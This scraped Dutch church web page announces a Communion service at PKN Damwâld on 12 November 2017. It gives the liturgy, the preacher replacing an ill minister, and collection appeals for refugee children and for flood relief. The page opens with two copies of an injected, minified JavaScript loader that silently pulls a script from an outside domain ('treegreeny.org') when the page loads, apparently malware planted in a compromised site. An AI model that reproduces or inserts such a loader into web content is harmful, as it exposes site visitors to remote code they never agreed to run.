;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 12 november 2017 9:30 uur - PKN Damwâld
zondag 12 november 2017
09:30 uur
Ds. Noordam vervangt de zieke ds. W.L. de Jong

Kerkdienst zondag 12 november 2017 9:30 uur

Thema: Viering Heilig Avondmaal

Informatie

Voorganger:Ds. J. Noordam, Nieuwendijk (N-Br.)
Organist:Foeke Wiegersma
Thema:Viering Heilig Avondmaal
Mededeling:Ds. Noordam vervangt de zieke ds. W.L. de Jong
Liturgie
Lied voor de dienst Elb 96
Welkom en mededelingen
Aanvangslied : Psalm 42 : 1 en 3
Stil gebed, votum en groet
Aanvangstekst :
We zingen: Psalm 43 : 3 en 4
Lezing van de Wet (Apostolisch vermaan): Efeziërs 2 : 1 t/m 10
We zingen: Psalm 65 : 2
Gebed om de opening van het Woord en de verlichting met de Heilige Geest
We lezen: Openbaring 22: 1-21
Collecte + kinderen mogen kleurplaat ophalen
We zingen: Psalm 62 : 1 en 4
Preek .
We zingen: Gezang 75 : 5 en 6
Lezing van het 2e deel van het Avondmaalsformulier, plus de vragen
Zingen bij het klaarmaken van de Tafel: Gezang 365
Viering van het Heilig Avondmaal
We lezen: Openbaring 19 : 6 t/m 9
Zingen na de viering Gezang 157 : 1 en 7
Dankzegging en dankgebed
Slotlied Gezang 430 : 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Voor de glimlach van een vluchtelingenkind

Binnenlands Diaconaat - Voor een glimlach van een vluchtelingkind
Geen eigen kamer, verdrietige volwassenen om je heen, steeds weer verhuizen en altijd weer die onzekerheid of je in Nederland mag blijven. Kinderen die opgroeien in een asielzoekerscentrum hebben vaak traumatische dingen meegemaakt voordat ze naar Nederland kwamen. En als ze eenmaal hier zijn, krijgen ze nog meer te verwerken. Samen met andere organisaties staat Kerk in Actie op de bres voor deze kinderen. Er worden allerlei activiteiten voor hen georganiseerd: kinderen kunnen een weekje op vakantie, er zijn recreatieve en sportactiviteiten in asielzoekerscentra, en kinderen kunnen een beroep doen op individuele rechtshulp of juridische bijstand. Met deze collecte steunt u de inzet van Kerk in Actie voor vluchtelingkinderen en voor andere diaconale projecten in Nederland. Van harte aanbevolen!

Tweede collecte: Kerk
Uitganscollecte: Avondmaalscollecte

Avondmaalscollecte: Noodhulp overstromingen Nepal en Bangladesh
Inmiddels zijn meer dan 42 miljoen mensen getroffen door overstromingen in Bangladesh, Nepal en India. Door onder meer modderstromen zijn er minstens 1200 doden. ICCO en Kerk in Actie bieden samen met lokale organisaties noodhulp: voedsel en schoon drinkwater. Eerder is al € 160.000,00 overgemaakt voor de noodhulp in het gebied. Het geld wordt ingezet voor de aanschaf van noodhulppakketten. In samenwerking met een Nepalese organisatie worden ondermeer 600 huishoudens uit Rautahat geholpen en in Bangladesh worden met een Bengalese partnerorganisatie noodhulp aan 2300 families in Gaibandha en 500 families in Kunderpara Char in de regio Sadar geboden.